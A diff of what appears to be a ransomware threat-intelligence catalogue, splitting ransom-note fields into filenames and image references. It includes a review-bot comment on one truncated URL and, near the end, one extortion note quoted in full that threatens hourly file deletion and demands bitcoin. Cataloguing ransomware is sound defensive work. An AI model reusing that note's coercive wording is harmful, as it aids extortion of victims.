-1789,7 +1863,7 @@ ], "payment-method": "Bitcoin", "price": "10", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-dLSbqOiIbLU/WHPh-akYinI/AAAAAAAADC0/6nFQClDBJ5M7ZhrjkhnxfkdboOh7SlE-ACLcB/s1600/v5YZMxt.jpg" ], "refs": [ 
@@ -1809,9 +1883,11 @@ ".evillock" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_DECRYPT_YOUR_FILES.TXT", - "HOW_TO_DECRYPT_YOUR_FILES.HTML", + "HOW_TO_DECRYPT_YOUR_FILES.HTML" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-0NFy_yDghZ0/WHO_ClbPdMI/AAAAAAAADCQ/RX2cgYg3z381gro6UUQtAED7JgXHbvGLgCLcB/s1600/note-txt_2.png", "https://4.bp.blogspot.com/-xxJ9xdRuWis/WHO_FL-hWcI/AAAAAAAADCU/VqI02AhzopQY1WKk-k6QYSdHFWFzg1NcACLcB/s1600/note_2.png" ], @@ -1835,7 +1911,7 @@ "date": "January 2017", "payment-method": "Bitcoin", "price": "0.03", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-3iMAtqvAmts/WHEyA_dW5OI/AAAAAAAADAY/tE5FtaVMJcc3aQQvWI4XOdjtvbXufFgywCLcB/s1600/lock1.jpg", "https://3.bp.blogspot.com/-DMxJm5GT0VY/WHEyEOi_vZI/AAAAAAAADAc/6Zi3IBuBz1I7jdQHcSrzhUGagGCUfs6iACLcB/s1600/lock2.jpg" ], @@ -1857,8 +1933,10 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "1000 CZK", - "ransomnotes": [ - "INFOK1.txt", + "ransomnotes-filenames": [ + "INFOK1.txt" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-i4ksJq-UzX8/WHFFXQL5wAI/AAAAAAAADA8/awfsqj1lr7IMBAPtE0tB44PNf1N6zkGDwCLcB/s1600/note_2.png", "https://1.bp.blogspot.com/-OlKgHvtAUHg/WHFDCx4thaI/AAAAAAAADAw/wzBXV17Xh-saaFGlrxw3CDNhGSTaVe2dQCLcB/s1600/lock1.jpg" ], @@ -1883,10 +1961,12 @@ ], "payment-method": "Bitcoin", "price": "155$", - "ransomnotes": [ - "https://2.bp.blogspot.com/-BclLp7x1sUM/WG6acqtDBbI/AAAAAAAAC_I/ToVEXx-G2DcKD4d7TZ0RkVqA1wRicxnZQCLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "READ_ME.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-BclLp7x1sUM/WG6acqtDBbI/AAAAAAAAC_I/ToVEXx-G2DcKD4d7TZ0RkVqA1wRicxnZQCLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/mafiaware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-6th-2017-fsociety-mongodb-pseudo-darkleech-and-more/", 
@@ -1920,8 +2000,10 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ - "How To Recover Encrypted Files.hta", + "ransomnotes-filenames": [ + "How To Recover Encrypted Files.hta" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Wk1_IdcEHbk/WG6FVnoaKlI/AAAAAAAAC-4/WeHzJAUJ0goxxuAoGUUebSgzGHrnD6LQQCLcB/s1600/Globe-ransom-note_2.png.png", "https://3.bp.blogspot.com/-lYkopoRH0wQ/WHOt1KhhzhI/AAAAAAAADCA/nPdhHK3wEucAK1GHodeh5w3HcpdugzSHwCLcB/s1600/globe3-9-1-17.png" ], @@ -1958,7 +2040,7 @@ ], "payment-method": "Bitcoin", "price": "500$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-np8abNpYeoU/WG1KX4_H0yI/AAAAAAAAC98/gxRJeDb01So5yTboXYP7sZWurJFBbWziACLcB/s1600/note-html.jpg" ], "refs": [ @@ -1981,9 +2063,11 @@ ".BTC" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "BTC_DECRYPT_FILES.txt", - "BTC_DECRYPT_FILES.html", + "BTC_DECRYPT_FILES.html" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-uiHluU553MU/WGzoFpEWkfI/AAAAAAAAC9o/M34ndwHUsoEfZiLJv9j4PCgBImS8oyYaACLcB/s1600/note_2.png" ], "refs": [ @@ -2005,7 +2089,7 @@ ], "payment-method": "Bitcoin", "price": "700$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-hMAakgAORvg/WG_i-lk09II/AAAAAAAADAI/Uq2iCHC5ngYzeVcuxQF0mcbrLqyOGcA_wCLcB/s1600/note.png" ], "refs": [ @@ -2024,8 +2108,10 @@ ".LOCKED" ], "payment-method": "Bitcoin - WebSite (onion)", - "ransomnotes": [ - "DecryptFile.txt", + "ransomnotes-filenames": [ + "DecryptFile.txt" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-cAnilnXjK7k/WG_OHhC_UdI/AAAAAAAAC_4/sdbzTx9hP4sryM7xE59ONdk7Zr8D_m6XwCLcB/s1600/note-txt_2.png", "https://1.bp.blogspot.com/-TDK91s7FmNM/WGpcwq5HmwI/AAAAAAAAC8Q/i0Q66vE7m-0kmrKPXWdwnYQg6Eaw2KSDwCLcB/s1600/note-pay_2.png" ], 
@@ -2047,7 +2133,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-dNBgohC1UYg/WGnXhem546I/AAAAAAAAC7w/Wv0Jy4173xsBJDZPLMxe6lXBgI5BkY4BgCLcB/s1600/note-lock.jpg" ], "refs": [ @@ -2067,8 +2153,10 @@ ".locked" ], "payment-method": "Website", - "ransomnotes": [ - "MESSAGE.txt", + "ransomnotes-filenames": [ + "MESSAGE.txt" + ], + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-tDS74fDwB1Q/WGk2D5DcUYI/AAAAAAAAC6s/vahju5JD9B4chwnNDUvDPp4ejZOxnj_awCLcB/s1600/note-wallp.jpg" ], "refs": [ @@ -2098,7 +2186,7 @@ ], "payment-method": "Bitcoin", "price": "1.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-T0PhVuoFSyA/WGk5mYkRFAI/AAAAAAAAC64/j14Pt84YUmQMNa_5LSEn6fZ5CoYqz60swCLcB/s1600/note-lock.jpg" ], "refs": [ @@ -2114,10 +2202,12 @@ "date": "January 2017", "encryption": "Twofish", "payment-method": "Email", - "ransomnotes": [ - "https://4.bp.blogspot.com/-XZNMg5P75r4/WI985j-EKHI/AAAAAAAADcw/jGdtXoq2pnwjlAbFAJia4UsXuJrV5AU3gCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "Xhelp.jpg" ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-XZNMg5P75r4/WI985j-EKHI/AAAAAAAADcw/jGdtXoq2pnwjlAbFAJia4UsXuJrV5AU3gCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2017/01/xcrypt-ransomware.html", "https://twitter.com/JakubKroustek/status/825790584971472902" @@ -2135,7 +2225,7 @@ ".7zipper" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-BR0DvtIft7g/WI95IF7IdUI/AAAAAAAADck/gzWAMbpFvaYicHFuMzvlM3YGJpgulMQBQCLcB/s1600/note_2.png" ], "refs": [ @@ -2157,7 +2247,7 @@ ], "payment-method": "Bitcoin", "price": "170€/$", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-SF4RsOANlI0/WJBQd4SJv6I/AAAAAAAADdY/hI-Ncw9FoFMi5jvljUftpzTgdykOfR3vgCLcB/s1600/lock-wallp_2.png.png" ], "refs": [ 
@@ -2177,7 +2267,7 @@ "encryption": "AES-256 (fake)", "payment-method": "Bitcoin", "price": "50£", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-zShnOIf3R_E/WJBfhC4CdSI/AAAAAAAADdo/6l4hwSOmI0Evj4W0Esj1S_uNOy5Yq6X0QCLcB/s1600/note1-2-3.gif" ], "refs": [ @@ -2198,7 +2288,7 @@ ], "payment-method": "Bitcoin", "price": "0.18 (100$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-vODt2aB9Hck/WJCFc3g5eCI/AAAAAAAADe8/OrEVkqUHMU4swRWedoZuBu50AWoKR1FGACLcB/s1600/netflix-note.jpg", "https://4.bp.blogspot.com/-Cw4e1drBKl4/WJCHmgp1vtI/AAAAAAAADfI/QqFxUsuad" ], @@ -2227,9 +2317,11 @@ ".MERRY" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "YOUR_FILES_ARE_DEAD.HTA", - "MERRY_I_LOVE_YOU_BRUCE.HTA", + "MERRY_I_LOVE_YOU_BRUCE.HTA" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-3F3QAZnDxsI/WGpvD4wZ2OI/AAAAAAAAC80/-2L6dIPqsgs8hZHOX0T6AFf5LwPwfZ-rwCLcB/s1600/note.png", "https://4.bp.blogspot.com/-_w8peyLMcww/WHNJ1Gb0qeI/AAAAAAAADBw/EVbR-gKipYoNujo-YF6VavafsUfWDANEQCLcB/s1600/8-1-17.png" ], @@ -2272,7 +2364,7 @@ "encryption": "AES-256+RSA", "payment-method": "Bitcoin", "price": "222 (200 000$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-8MqANWraAgE/WGT7mj-XirI/AAAAAAAAC3g/H_f1hTxa7Sc_DEtllBe-vYaAfY-YqMelgCLcB/s1600/wallp.png" ], "refs": [ @@ -2298,10 +2390,12 @@ ], "payment-method": "Bitcoin", "price": "20 - 30$", - "ransomnotes": [ - "https://3.bp.blogspot.com/-9vg_tRPq8rQ/WGOjf4ULuGI/AAAAAAAACzw/d16uRmEOotsCbRM4hwvzQ6bB8xAVNJ7ogCLcB/s1600/DeriaLock.gif", + "ransomnotes-filenames": [ "unlock-everybody.txt" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-9vg_tRPq8rQ/WGOjf4ULuGI/AAAAAAAACzw/d16uRmEOotsCbRM4hwvzQ6bB8xAVNJ7ogCLcB/s1600/DeriaLock.gif" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/derialock-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/" 
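Review bot: The second entry retyped as a reference in hunk `@@ -2198,7 +2288,7 @@` is a truncated URL, `https://4.bp.blogspot.com/-Cw4e1drBKl4/WJCHmgp1vtI/AAAAAAAADfI/QqFxUsuad`, which lacks the `/s1600/<image>` tail every other blogspot link in this patch carries. The truncation predates the commit, but now that the array is labelled `ransomnotes-refs` a link that cannot resolve gives the consumer nothing to verify; either complete it from the source post or drop it. The enclosing entry starts and ends outside the hunk, so the entry's `value` is not visible here.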
@@ -2319,10 +2413,12 @@ ".bript" ], "payment-method": "Email - Bitcoin", - "ransomnotes": [ - "https://3.bp.blogspot.com/-hApL-ObdWsk/WGAYUyCzPcI/AAAAAAAACyg/NuL26zNgRGcLnnF2BwgOEn3AYMgVu3gQACLcB/s1600/More-note.png", + "ransomnotes-filenames": [ "More.html" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-hApL-ObdWsk/WGAYUyCzPcI/AAAAAAAACyg/NuL26zNgRGcLnnF2BwgOEn3AYMgVu3gQACLcB/s1600/More-note.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/badencript-ransomware.html", "https://twitter.com/demonslay335/status/813064189719805952" @@ -2340,7 +2436,7 @@ ".adam" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-9IgXt6L0hLY/WGARdzJgfvI/AAAAAAAACyQ/1bfnX_We65AirDcAFpiG49NPuBMfGH9wwCLcB/s1600/note-adam.jpg" ], "refs": [ @@ -2360,7 +2456,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-bFPI3O1BI3s/WGPpvnDvNNI/AAAAAAAAC10/mLUiFOCWnEkjbV91PmUGnc3qsFMv9um8QCLcB/s1600/wallp.jpg" ], "refs": [ @@ -2390,7 +2486,7 @@ ], "payment-method": "Bitcoin", "price": "0.1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-NiQ6rSIprB8/WF-uxTMq6hI/AAAAAAAACyA/tA6qO3aJdGc0Dn_I-IOZOM3IwN5rgq9sACLcB/s1600/note-koko.jpg" ], "refs": [ @@ -2414,8 +2510,10 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ - "YOU_HAVE_BEEN_HACKED.txt", + "ransomnotes-filenames": [ + "YOU_HAVE_BEEN_HACKED.txt" + ], + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-yncl7-Jy198/WGDjdgNKXjI/AAAAAAAACzA/bfkDgwWEGKggUG3E1tgPBAWDXwi-p-7AwCLcB/s1600/note_2.png" ], "refs": [ @@ -2432,7 +2530,7 @@ "encryption": "AES-256+RSA", "payment-method": "Bitcoin", "price": "0.6 - 1.6", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-T9Mt0pE7kwY/WF7NKAPfv1I/AAAAAAAACxw/gOjxeSR0x7EurKQTI2p6Ym70ViYuYdsvQCLcB/s1600/note_2.png" ], "refs": [ 
@@ -2455,7 +2553,7 @@ ], "payment-method": "Bitcoin", "price": "0.4", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-0-kDVCM-kuI/WGVH-d2trGI/AAAAAAAAC4A/4LlxFpwkhEk89QcJ5ZhO1i-T6dQ_RcVegCEw/s1600/guster-note-2.jpg" ], "refs": [ @@ -2475,7 +2573,7 @@ ".madebyadam" ], "payment-method": "Website (gift card)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-ZIWywQMf2mY/WGJD-rqLZYI/AAAAAAAACzQ/p5PWlpWyHjcVHKq74DOsE7yS-ornW48_QCLcB/s1600/note.jpg" ], "refs": [ @@ -2504,7 +2602,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-LDSJ7rws1WI/WGDR-oDSshI/AAAAAAAACyw/_Kn0mnjpm2YN5tS9YldEnca-zOLJpXjcACLcB/s1600/crypto1-2.gif" ], "refs": [ @@ -2527,7 +2625,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-TkMikT4PA3o/WFrb4it2u9I/AAAAAAAACww/_zZgu9EHBj8Ibar8i5ekwaowGBD8EoOygCLcB/s1600/note.jpg" ], "refs": [ @@ -2547,7 +2645,7 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.2 (160$)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-85wiBKXIqro/WFrFOaNeSsI/AAAAAAAACwA/UyrPc2bKQCcznmtLTFkEfc6lEvhseyRYACLcB/s1600/lock1.jpg" ], "refs": [ @@ -2569,7 +2667,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-owEtII_eezA/WFmOp0ccjaI/AAAAAAAACvk/gjYcSeflS4AChm5cYO5c3EV4aSmzr14UwCLcB/s1600/enc100.gif" ], "refs": [ @@ -2604,7 +2702,7 @@ ".braincrypt" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-KrKO1vYs-1w/WFlw6bOfI_I/AAAAAAAACug/42w1VSl2GIoxRuA2SPKJr6xYp3c4OBnJQCLcB/s1600/note_2.png", "https://3.bp.blogspot.com/-8bxTSAADM7M/WFmBEu-eUXI/AAAAAAAACvU/xaQBufV5a-4GWEJhXj2VVLqXnTjQJYNrwCLcB/s1600/note-brain2.jpg" ], 
@@ -2622,10 +2720,12 @@ "encryption": "AES", "payment-method": "Bitcoin", "price": "0.2", - "ransomnotes": [ - "https://2.bp.blogspot.com/-R-lKbH_tLvs/WGPRa-hCtqI/AAAAAAAAC1Y/zgKYZmys_jciaYhtTUsVLen5IHX8_LyiACLcB/s1600/note_2.png", + "ransomnotes-filenames": [ "RESTORE_YOUR_FILES.txt" ], + "ransomnotes-refs": [ + "https://2.bp.blogspot.com/-R-lKbH_tLvs/WGPRa-hCtqI/AAAAAAAAC1Y/zgKYZmys_jciaYhtTUsVLen5IHX8_LyiACLcB/s1600/note_2.png" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/msn-cryptolocker-ransomware.html", "https://twitter.com/struppigel/status/810766686005719040" @@ -2641,7 +2741,7 @@ "encryption": "RSA-2048", "payment-method": "Bitcoin", "price": "0.3", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-4Y7GZEsWh7A/WFfnmQFF7nI/AAAAAAAACsQ/j3rXZmWrDxMM6xhV1s4YVl_WLDe28cpAwCLcB/s1600/001.jpg" ], "refs": [ @@ -2661,8 +2761,10 @@ ".aes256" ], "payment-method": "Email", - "ransomnotes": [ - "!!! READ THIS -IMPORTANT !!!.txt", + "ransomnotes-filenames": [ + "!!! READ THIS -IMPORTANT !!!.txt" + ], + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-GdF-kk1j9-8/WFl6NVm3PAI/AAAAAAAACvE/guFIi_FUpgIQNzX-usJ8CpofX45eXPvkQCLcB/s1600/note_2.png" ], "refs": [ @@ -2681,7 +2783,7 @@ ".encrypted" ], "payment-method": "Game", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-kz7PePfAiLI/WGTpY3us5LI/AAAAAAAAC3A/wu1rkx-BWlMzglJXXmCxeuYzbZKN5FP4gCLcB/s1600/koolova-v2.png" ], "refs": [ 
@@ -2703,10 +2805,12 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ - "https://1.bp.blogspot.com/-F8oAU82KnQ4/WFWgxjZz2vI/AAAAAAAACrI/J76wm21b5K4F9sjLF1VcEGoif3cS-Y-bwCLcB/s1600/note.jpg", + "ransomnotes-filenames": [ "HOW_OPEN_FILES.hta" ], + "ransomnotes-refs": [ + "https://1.bp.blogspot.com/-F8oAU82KnQ4/WFWgxjZz2vI/AAAAAAAACrI/J76wm21b5K4F9sjLF1VcEGoif3cS-Y-bwCLcB/s1600/note.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/fake-globe-ransomware.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-30th-2016-infected-tvs-and-open-source-ransomware-sucks/", @@ -2742,7 +2846,7 @@ ".v8" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-Acmbpw6fEaQ/WFUFKU9V9ZI/AAAAAAAACqc/47AceoWZzOwP9qO8uenjNVOVXeFJf7DywCLcB/s1600/note_2.png" ], "refs": [ @@ -2761,7 +2865,7 @@ ".ENC" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-I0fsQu2YXMI/WFLb9LPdkFI/AAAAAAAACoY/xqRhgO1o98oruVDMC6rO4RxCk5MFDSTYgCLcB/s1600/lock.jpg" ], "refs": [ @@ -2780,7 +2884,7 @@ ".antihacker2017" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-k7iDPgj17Zo/WFKEfMvR4wI/AAAAAAAACn4/8irB4Tf1x_MjfTmWaAjuae6mFJbva6GcwCLcB/s1600/note.jpg" ], "refs": [ @@ -2796,7 +2900,7 @@ "date": "December 2016", "payment-method": "Dollars", "price": "100 - 250 - 500", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-6I7jtsp5Wi4/WFLqnfUvg5I/AAAAAAAACow/BCOv7etYxxwpIERR1Qs5fmJ2wKBx3sqmACLcB/s1600/screen-locker.png" ], "refs": [ @@ -2814,7 +2918,7 @@ "meta": { "date": "December 2016", "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-LY1A0aeA_c0/WFEduvkiNQI/AAAAAAAACjk/B2-nFQoExscMVvZqvCaf9R4z_C6-rSdvACLcB/s1600/note2.png.png" ], "refs": [ 
@@ -2835,11 +2939,13 @@
 ],
 "payment-method": "Bitcoin",
 "price": "2",
- "ransomnotes": [
- "https://3.bp.blogspot.com/-E4brsgJRDHA/WFBU7wPaYLI/AAAAAAAACjU/sLEkzMiWp5wuc8hpFbylC7lLVMhftCLGgCLcB/s1600/111m.png",
- "https://2.bp.blogspot.com/-b5caw8XAvIQ/WFBUuOto40I/AAAAAAAACjQ/_yzwIU17BHw4Ke4E3wM_XBI1XfnAvGSZQCLcB/s1600/005.png",
+ "ransomnotes-filenames": [
 "_HELP_YOUR_FILES.html"
 ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-E4brsgJRDHA/WFBU7wPaYLI/AAAAAAAACjU/sLEkzMiWp5wuc8hpFbylC7lLVMhftCLGgCLcB/s1600/111m.png",
+ "https://2.bp.blogspot.com/-b5caw8XAvIQ/WFBUuOto40I/AAAAAAAACjQ/_yzwIU17BHw4Ke4E3wM_XBI1XfnAvGSZQCLcB/s1600/005.png"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/12/kraken-ransomware.html"
 ]
@@ -2854,7 +2960,7 @@
 "encryption": "AES",
 "payment-method": "Bitcoin",
 "price": "0.25",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://1.bp.blogspot.com/-6iMtvGe3T58/WE8Ftx7zcUI/AAAAAAAACiE/2ISTxSYzgKEgnfQ7FSUWo3BiCeVLHH_uwCLcB/s1600/note.jpg"
 ],
 "refs": [
@@ -2874,10 +2980,12 @@
 ],
 "payment-method": "Bitcoin",
 "price": "950 bresilian real ($)",
- "ransomnotes": [
- "https://3.bp.blogspot.com/-MWEyG49z2Qk/WE78wLqCXPI/AAAAAAAAChw/SIlQSe_o_wMars2egfZ7VqKfWuan6ThwQCLcB/s1600/note1.jpg",
+ "ransomnotes-filenames": [
 "!!!!!ATENÇÃO!!!!!.html"
 ],
+ "ransomnotes-refs": [
+ "https://3.bp.blogspot.com/-MWEyG49z2Qk/WE78wLqCXPI/AAAAAAAAChw/SIlQSe_o_wMars2egfZ7VqKfWuan6ThwQCLcB/s1600/note1.jpg"
+ ],
 "refs": [
 "https://id-ransomware.blogspot.co.il/2016/12/payday-ransomware.html",
 "https://twitter.com/BleepinComputer/status/808316635094380544"
@@ -2910,7 +3018,9 @@ "payment-method": "Bitcoin", "price": "0.3", "ransomnotes": [ - "I want to play a game with you. Let me explain the rules. Your personal files are being deleted. Your photos, videos, documents, etc... But, don't worry! It will only happen if you don't comply. However I've already encrypted your personal files, so you cannot access therm. Every hour I select some of them to delete permanently, therefore I won't be able to access them, either. Are you familiar with the concept of exponential growth? Let me help you out. It starts out slowly then increases rapidly. During the first 24 hour you will only lose a few files, the second day a few hundred, the third day a few thousand, and so on. If you turn off your computer or try to close me, when i start the next time you will het 1000 files deleted as punishment. Yes you will want me to start next time, since I am the only one that is capable to decrypt your personal data for you. Now, let's start and enjoy our little game together! Send 0.3 bitcoins to this adress to unlock your Pc with your email adress Your can purchase bitcoins from localbitcoins", + "I want to play a game with you. Let me explain the rules. Your personal files are being deleted. Your photos, videos, documents, etc... But, don't worry! It will only happen if you don't comply. However I've already encrypted your personal files, so you cannot access therm. Every hour I select some of them to delete permanently, therefore I won't be able to access them, either. Are you familiar with the concept of exponential growth? Let me help you out. It starts out slowly then increases rapidly. During the first 24 hour you will only lose a few files, the second day a few hundred, the third day a few thousand, and so on. If you turn off your computer or try to close me, when i start the next time you will het 1000 files deleted as punishment. 
Yes you will want me to start next time, since I am the only one that is capable to decrypt your personal data for you. Now, let's start and enjoy our little game together! Send 0.3 bitcoins to this adress to unlock your Pc with your email adress Your can purchase bitcoins from localbitcoins" + ], + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-9MsC3A3tuUA/WFGZM45Pw5I/AAAAAAAACms/NbDFma30D9MpK2Zc0O6NvDizU8vqUWWlwCLcB/s1600/M4N1F3STO.jpg" ], "refs": [ @@ -2946,7 +3056,7 @@ ], "payment-method": "Bitcoin", "price": "1000 $", - "ransomnotes": [ + "ransomnotes-refs": [ "https://1.bp.blogspot.com/-DOjKnuzCMo8/WE1Xd8yksiI/AAAAAAAACfo/d93v2xn857gQDg4o5Rd4oZpP3q-Ipv9xgCLcB/s1600/UltraLocker.png" ], "refs": [ @@ -2966,7 +3076,7 @@ ".pre_alpha" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-6NIoKnSTwcs/WExcV900C_I/AAAAAAAACfI/_Hba3mOwk3UQ0T5rGercOglMsCTjVtCnQCLcB/s1600/note2.png" ], "refs": [ @@ -2988,7 +3098,7 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ + "ransomnotes-refs": [ "https://2.bp.blogspot.com/-Lyd1uRKG-94/WFJ3TbNqWfI/AAAAAAAACnc/4LoazYU0S1s1YRz3Xck3LN1vOm5RwIpugCLcB/s1600/note.jpg", "https://4.bp.blogspot.com/-eBeh1lzEYsI/WFJ4l1oJ4fI/AAAAAAAACno/P5inceelNNk-zfkJGhE3XNamOGC8YmBwwCLcB/s1600/str123.gif" ], @@ -3008,7 +3118,7 @@ "_morf56@meta.ua_" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://3.bp.blogspot.com/-Fh2I6542zi4/WEpmphY0i1I/AAAAAAAACe4/FBP3J6UraBMkSMTWx2tm-FRYnmlYLtFWgCLcB/s1600/note2.png.png" ], "refs": [ 
@@ -3029,12 +3139,14 @@ ], "payment-method": "Bitcoin", "price": "0.5 - 1", - "ransomnotes": [ - "https://3.bp.blogspot.com/-WxtRn5yVcNw/WEmgAPgO4AI/AAAAAAAACeo/M7iS6L8pSOEr8EUDkCK_g6h0aMKQQXfGwCLcB/s1600/note2.png", - "https://3.bp.blogspot.com/-sLwR-6y2M-I/WEmVIdJuPMI/AAAAAAAACeY/gpQDT-2-d7kkrfTHgiEZCfxViHu7dNE7ACLcB/s1600/med.jpg", + "ransomnotes-filenames": [ "restore_your_files.html", "restore_your_files.txt" ], + "ransomnotes-refs": [ + "https://3.bp.blogspot.com/-WxtRn5yVcNw/WEmgAPgO4AI/AAAAAAAACeo/M7iS6L8pSOEr8EUDkCK_g6h0aMKQQXfGwCLcB/s1600/note2.png", + "https://3.bp.blogspot.com/-sLwR-6y2M-I/WEmVIdJuPMI/AAAAAAAACeY/gpQDT-2-d7kkrfTHgiEZCfxViHu7dNE7ACLcB/s1600/med.jpg" + ], "refs": [ "https://id-ransomware.blogspot.co.il/2016/12/popcorntime-ransomware.html", "https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/" @@ -3053,7 +3165,7 @@ ], "payment-method": "Bitcoin", "price": "0.33 - 0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-G-xrI4N08hs/WFJjQgB3ojI/AAAAAAAACnM/DEfy_skSg044UmbBfNodiQY4OaLkkQPOwCLcB/s1600/note-hacked.jpg" ], "refs": [ @@ -3073,7 +3185,7 @@ ], "payment-method": "Bitcoin", "price": "1.33 - 1.34", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-qcJxWivTx1w/WEcEW14om5I/AAAAAAAACa4/xLAlsQGZjeg7Zlg3F2fQAcgQ_6b_cNQLACLcB/s1600/goldeneye-1.jpg", "https://4.bp.blogspot.com/-avE8liOWdPY/WEcEbdTxx6I/AAAAAAAACa8/KOKgXzU1h2EJ0tTOKMdQzZ_JdWWNeFMdwCLcB/s1600/goldeneye-1-2.jpg" ], @@ -3096,7 +3208,7 @@ ], "payment-method": "Bitcoin", "price": "0.74 (545 $)", - "ransomnotes": [ + "ransomnotes-refs": [ "https://4.bp.blogspot.com/-GasUzax8cco/WEar0U0tPqI/AAAAAAAACZw/6V_1JFxLMH0UnmLa3-WZa_ML9JbxF0JYACEw/s1600/note-txt2.png" ], "refs": [ 
@@ -3118,7 +3230,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "4(1040 $)",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://2.bp.blogspot.com/-Lhq40sgYUpI/WEWpGkkWOKI/AAAAAAAACZQ/iOp9g9Ya0Fk9vZrNKwTEMVcEOzKFIwqgACLcB/s1600/english-2.png"
 ],
 "refs": [
